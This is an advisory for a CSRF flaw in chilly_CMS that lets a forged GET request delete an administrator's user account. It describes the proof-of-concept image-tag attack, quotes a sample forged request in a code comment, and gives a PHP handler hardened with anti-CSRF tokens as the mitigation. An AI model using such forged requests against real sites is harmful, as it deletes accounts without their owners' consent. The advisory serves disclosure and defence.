vendor: chilly_CMS
by: Pratul Agrawal
CVSS: 8.8 (HIGH)
CWE: 352 (Cross Site Request Forgery (CSRF))
Product Name: chilly_CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: chillycms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: php
2020
chilly_CMS CSRF Vulnerability
A proof-of-concept page was created that deletes the admin user through Cross Site Request Forgery (CSRF). The page carries an image tag whose src points at the CMS with the action parameter set to deleteuser and the id parameter set to the target user's ID. When a logged-in administrator views the page, the browser sends that GET request with the administrator's session cookie attached, and the CMS performs the deletion without any check that the request originated from its own interface. After the page had loaded, refreshing the CMS showed that the previously added user account had been deleted.
Mitigation:
Require a per-session anti-CSRF token on every state-changing request and validate it server-side before acting. Deletions should be accepted only over POST, never in response to a GET that an image tag can trigger. Setting the session cookie to SameSite=Lax or Strict adds a second layer of defence, but the server-side token check is the actual fix.
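The following PHP is an added example illustrating both the forged request described above and the token-based mitigation; it is not code from chilly_CMS. The script name admin.php, the deleteuser action, the csrf_token field and the $users array are assumed names used only for illustration.

```php
<?php
// Added example (not chilly_CMS code): a user-deletion handler hardened with a
// per-session synchronizer token. admin.php, deleteuser, csrf_token and $users
// are assumed names.
session_start();

// Issue one random token per session; it is embedded in every state-changing form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison of the submitted token against the session copy.
function csrf_valid(?string $submitted): bool {
    if ($submitted === null || empty($_SESSION['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

// Vulnerable pattern from the advisory: a page containing
//   <img src="https://victim.example/admin.php?action=deleteuser&id=2">
// makes the admin's browser send that GET with the session cookie, and the
// deletion runs with no further check.
//
// Hardened dispatcher: the action mutates state only on POST and only when the
// token matches, so the image-tag GET and a forged cross-site POST both fail.
function handle_request(array $users): array {
    if (($_REQUEST['action'] ?? '') !== 'deleteuser') {
        return $users;
    }
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        http_response_code(405);            // GET must never change state
        return $users;
    }
    if (!csrf_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);            // forged request without the token
        return $users;
    }
    $id = filter_var($_POST['id'] ?? '', FILTER_VALIDATE_INT);
    if ($id === false || !isset($users[$id])) {
        http_response_code(400);
        return $users;
    }
    unset($users[$id]);
    return $users;
}

// Form that legitimately triggers the deletion; the hidden field carries the token.
function delete_form(int $id): string {
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="admin.php">'
         . '<input type="hidden" name="action" value="deleteuser">'
         . '<input type="hidden" name="csrf_token" value="' . $token . '">'
         . '<input type="hidden" name="id" value="' . $id . '">'
         . '<button type="submit">Delete user</button></form>';
}
```

An attacker's page cannot read the token, because it lives in the victim's session and is only rendered into pages served to the victim, so the forged request cannot include it. On PHP 7.3 and later, calling session_set_cookie_params with 'samesite' => 'Lax' before session_start() stops most browsers from attaching the cookie to cross-site requests at all, which is worth adding as defence in depth.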